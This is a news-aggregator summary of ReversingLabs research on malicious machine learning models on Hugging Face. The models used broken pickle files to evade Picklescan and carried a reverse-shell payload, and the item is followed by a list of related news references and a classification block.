News from the AI & ML world

DeeperML

karlo.zanki@reversinglabs.com (Karlo Zanki)@Blog (Main) //
Cybersecurity researchers have identified malicious machine learning (ML) models on Hugging Face, a popular platform for sharing and collaborating on ML projects. The models leverage a novel attack technique called "nullifAI," which uses "broken" pickle files to evade detection. This method abuses the Pickle file serialization process, allowing Python code execution during ML model deserialization. The malicious models, which resemble proof-of-concept models, were initially not flagged as unsafe by Hugging Face's Picklescan security tool.

Researchers from ReversingLabs discovered two such models on Hugging Face containing malicious code. The nullifAI attack exploits differences in compression format with PyTorch and a security issue preventing proper scanning of Pickle files. The malicious payload in both cases was a platform-aware reverse shell that connects to a hard-coded IP address. The Hugging Face security team has since removed the malicious models and improved Picklescan's detection capabilities.
Original img attribution: https://www.reversinglabs.com/hubfs/Blog/hugging-face-blog.webp
ImgSrc: www.reversingla

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • Blog (Main): Researchers from ReversingLabs recently discovered two Hugging Face models containing malicious code. The nullifAI attack involves abusing Pickle file serialization.
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • The Hacker News: Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
  • www.csoonline.com: Attackers hide malicious code in Hugging Face AI model Pickle files
  • ciso2ciso.com: Malicious ML Models on Hugging Face Exploit Novel Attack Technique – Source: www.infosecurity-magazine.com
  • cyberscoop.com: Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • Anonymous ???????? :af:: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • ciso2ciso.com: Security Week - Malicious AI Models on Hugging Face Exploit Novel Attack Technique
  • Threats | CyberScoop: Cyberscoop - Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • Anonymous ???????? :af:: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • Help Net Security: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.helpnetsecurity.com: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.scworld.com: Security news about hugging face with malicious ai models
  • : The abuse of Pickle, a popular Python module that many teams use for serializing and deserializing ML model data
  • Virus Bulletin: Virus Bulletin reports on researchers from ReversingLabs discovering two Hugging Face models containing malicious code.
Classification:
  • HashTags: #HuggingFace #MaliciousML #NullifAI
  • Company: Hugging Face
  • Target: Hugging Face Users
  • Product: Hugging Face
  • Feature: Pickle Serialization
  • Malware: Pickle
  • Type: AI
  • Severity: Major